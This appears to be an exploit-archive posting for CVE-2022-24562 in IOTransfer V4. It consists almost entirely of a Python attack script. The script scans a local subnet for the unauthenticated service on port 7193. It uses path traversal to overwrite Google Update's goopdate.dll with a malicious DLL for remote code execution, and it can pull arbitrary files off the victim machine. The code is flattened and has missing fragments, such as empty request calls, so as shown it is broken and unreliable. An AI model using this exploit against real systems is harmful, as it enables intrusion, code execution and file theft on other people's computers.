IOTransfer 4.0 Remote Code Execution

Credit: Tomer Peled
Risk: High
Local: No
Remote: Yes

# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE) # Date: 06/22/2022 # Exploit Author: Tomer Peled # Vendor Homepage: # Software Link: # Version: V4 and onward # Tested on: Windows 10 # CVE : 2022-24562 # References: import os from urllib3.exceptions import ConnectTimeoutError from win32com.client import * import requests import json localPayloadPath = r"c:\temp\malicious.dll" remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll" remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf' Range = "192.168.89" UpOrDown="Upload" IP = "" UserName = "" def get_version_number(file_path): information_parser = Dispatch("Scripting.FileSystemObject") version = information_parser.GetFileVersion(file_path) return version def getTaskList(IP, taskid=""): print("Getting task list...") url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*' res = requests.get(url) tasks = json.loads(res.content) tasks = json.loads(tasks['content']) for task in tasks['tasks']: if taskid == task['taskid']: print(f"Task ID found: {taskid}") def CreateUploadTask(IP): SetSavePath(IP) url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', } res =, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"[*] TaskID: {taskid}") return taskid def CreateUploadDetailNode(IP, taskid, remotePath, size='100'): url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0' file_info = { 'size': size, 'savefilename': remotePath, 'name': remotePath, 'fullpath': r'c:\windows\system32\calc.exe', 'md5': 'md5md5md5md5md5', 'filetype': '3', } res =, json=file_info) js = json.loads(res.content) print(f"[V] Create Detail returned: {js['code']}") def readFile(Path): file = open(Path, "rb") byte = next = "Start" while next != b'': byte = byte + next = if next != b'': byte = byte + next file.close() return byte def CallUpload(IP, taskid, localPayloadPath): url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0' send_data = readFile(localPayloadPath) try: res =, data=send_data) js = json.loads(res.content) if js['code'] == 200: print("[V] Success payload uploaded!") else: print(f"CreateRemoteFile: {res.content}") except: print("[*] Reusing the task...") res =, data=send_data) js = json.loads(res.content) if js['code'] == 200 or "false" in js['error']: print("[V] Success payload uploaded!") else: print(f"[X] CreateRemoteFile Failed: {res.content}") def SetSavePath(IP): url = f'http://{IP}:7193/index.php?action=setiotconfig' config = { 'tasksavepath': 'C:\\Program ' }, json=config) def ExploitUpload(IP,payloadPath,rPath,taskid =None): if not taskid: taskid = CreateUploadTask(IP) size = os.path.getsize(payloadPath) CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size)) CallUpload(IP, taskid, payloadPath) def CreateDownloadTask(IP, Path) -> str: url = f'http://{IP}:7193/index.php?action=createtask' task = { 'method': 'get', 'version': '1', 'userid': '*', 'taskstate': '0', 'filepath': Path } res =, json=task) task = json.loads(res.content) task = json.loads(task['content']) taskid = task['taskid'] print(f"TaskID: {taskid}") return taskid def ExploitDownload(IP, DownloadPath, ID=None): if ID: url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}' else: taskid = CreateDownloadTask(IP, DownloadPath) url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}' res = requests.get(url) return res def ScanIP(startRange): print("[*] Searching for vulnerable IPs", end='') Current = 142 IP = f"{startRange}.{Current}" VulnerableIP: str = "" UserName: str = "" while Current < 252: print(".", end='') url = f'http://{IP}:7193/index.php?action=getpcname&userid=*' try: res = requests.get(url, timeout=1) js = json.loads(res.content) js2 = json.loads(js['content']) UserName = js2['name'] VulnerableIP=IP print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}") print(f"[!] Vulnerable PC username: {UserName}") return VulnerableIP,UserName except Exception as e: pass except ConnectTimeoutError: pass IP = f"{startRange}.{Current}" Current = Current + 1 return None,None if __name__ == '__main__': IP,UserName = ScanIP(Range) if IP is None or UserName is None: print("[X] No vulnerable IP found") exit() print("[*] Starting Exploit...") if UpOrDown == "Upload": print(f"[*]Local Payload Path: {localPayloadPath}") print(f"[*]Remote Upload Path: {remotePayloadPath}") ExploitUpload(IP,localPayloadPath,remotePayloadPath) elif UpOrDown == "Download": print(f"[*] Downloading the file: {remoteDownloadPath}") res = ExploitDownload(IP, remoteDownloadPath) file = open("out.pdf", "wb+") file.write(res.content) file.close()

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